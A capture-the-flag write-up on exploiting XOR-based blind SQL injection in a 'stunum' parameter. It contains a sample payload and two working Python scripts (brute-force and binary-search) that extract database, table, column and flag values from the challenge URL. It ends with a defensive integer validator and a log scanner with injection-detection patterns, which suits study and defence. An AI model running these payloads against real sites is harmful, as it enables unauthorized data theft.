Inputs 1 to 4 all work; from 5 onward the record no longer exists.
Most likely SQL injection, but the input data is restricted, so only error-based injection or blind injection would be usable.
After trying, though, error-based injection, boolean-based blind injection and time-based blind injection all fail; every one of them just echoes "not exists".
Try XOR injection.
Entering 1^0 returns the correct page and 1^1 the wrong one, which shows that XOR injection works.
1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1
This is what the correct result looks like.
The wrong result looks like this.
Using this, the flag can eventually be obtained.
Someone else's scripts (I can't write one yet)
Pure brute-force script
import requests
import time

if __name__ == '__main__':
    url = 'http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/?stunum='
    result = ''
    for i in range(1, 500):  # outer loop: character position
        for j in range(31, 129):  # inner loop: candidate ASCII value
            # One payload per stage (database, tables, columns, flag); swap in the one you need.
            payload1 = '1^if(ascii(substr(database(),{},1))={},1,0)'.format(i, j)
            payload2 = '1^if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)="ctf"),{},1))={},1,0)'.format(i, j)
            payload3 = '1^if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)="flag"),{},1))={},1,0)'.format(i, j)
            payload4 = '1^if(ascii(substr((select(value)from(flag)),{},1))={},1,0)'.format(i, j)
            response = requests.get(url + payload4)
            print(payload4 + " " + str(response.status_code))
            time.sleep(0.1)
            # A correct guess makes 1^1 = 0, so stunum becomes 0 and the page answers
            # "not exists"; a wrong guess leaves stunum = 1 and the normal page comes back.
            if "exists" in response.text:
                result += chr(j)
                print(result)
                break
        else:
            # No candidate matched at this position, so the string is complete;
            # stop the outer loop as well instead of probing the next position.
            print("All is end" + result)
            break
Binary-search script
import requests
import time

url = 'http://3d4099b4-ada7-4531-b403-a98484bee6fd.node4.buuoj.cn:81/'
database = ""
payload1 = "?stunum=1^(ascii(substr((select(database())),{},1))>{})^1"  # database name is ctf
payload2 = "?stunum=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"  # table names: flag, score
payload3 = "?stunum=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"  # column names: flag, value
payload4 = "?stunum=1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"  # flag value

for i in range(1, 10000):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # payload = payload1.format(i, mid)  # database name
        # payload = payload2.format(i, mid)  # table names
        # payload = payload3.format(i, mid)  # column names
        payload = payload4.format(i, mid)  # flag
        new_url = url + payload
        r = requests.get(new_url)
        time.sleep(0.1)
        print(new_url)
        # 1^(cond)^1 evaluates to 1 when cond is true, so the normal score page
        # means ascii(char) > mid; otherwise ascii(char) <= mid.
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Past the end of the string ascii('') = 0 and the search bottoms out at 32;
    # 128 (the upper bound, high never exceeds it) means no printable char matched.
    if mid == 32 or mid == 128:
        break
    database += chr(mid)
    print(database)
print(database)
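From the defending side, here is an added example (not part of the writeup or of the scripts above) of the two controls this challenge makes obvious: the server should accept stunum only as a plain integer, and the XOR/ascii/substr probe strings the scripts send are easy to spot in access logs. The log format, client IPs and marker list are constructed assumptions for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlparse

# Markers of the XOR / boolean blind probing used against stunum on this page.
# Constructed for this example; tune the list to your own application.
INJECTION_MARKERS = re.compile(
    r"\^|\bascii\s*\(|\bsubstr\s*\(|\bif\s*\(|group_concat|information_schema",
    re.IGNORECASE,
)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def parse_stunum(raw):
    """Server-side fix: stunum is accepted only as a short plain integer, so
    '1^0', '1^if(...)' and '' are refused before any query is built. The int
    must then be bound as a query parameter, never formatted into the SQL."""
    if raw is None or not re.fullmatch(r"\d{1,10}", raw):
        return None
    return int(raw)

def classify_request(path):
    """'ok' for a numeric stunum, 'probe' when the value carries injection
    markers, 'reject' for any other non-numeric value."""
    qs = parse_qs(urlparse(path).query, keep_blank_values=True)
    raw = qs.get("stunum", [""])[0]
    if parse_stunum(raw) is not None:
        return "ok"
    return "probe" if INJECTION_MARKERS.search(unquote(raw)) else "reject"

def scan_log(lines):
    """Label each access-log line and count probes per client IP: one IP
    issuing many probes is the blind-extraction loop the scripts above run."""
    labels, per_ip = [], Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            ip, path, _status = m.groups()
            label = classify_request(path)
            labels.append((ip, label))
            if label == "probe":
                per_ip[ip] += 1
    return labels, per_ip

# Constructed sample access-log lines (combined-log-like format).
SAMPLE_LOG = [
    '203.0.113.9 - - [01/May/2024:10:00:01 +0000] "GET /?stunum=3 HTTP/1.1" 200 612',
    '198.51.100.7 - - [01/May/2024:10:00:03 +0000] "GET /?stunum=1%5E0 HTTP/1.1" 200 612',
    '198.51.100.7 - - [01/May/2024:10:00:05 +0000] "GET /?stunum=1%5E(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)%5E1 HTTP/1.1" 200 612',
    '192.0.2.4 - - [01/May/2024:10:00:06 +0000] "GET /?stunum=abc HTTP/1.1" 200 420',
]
```

Running scan_log(SAMPLE_LOG) labels the four lines ok, probe, probe, reject and counts two probes from 198.51.100.7.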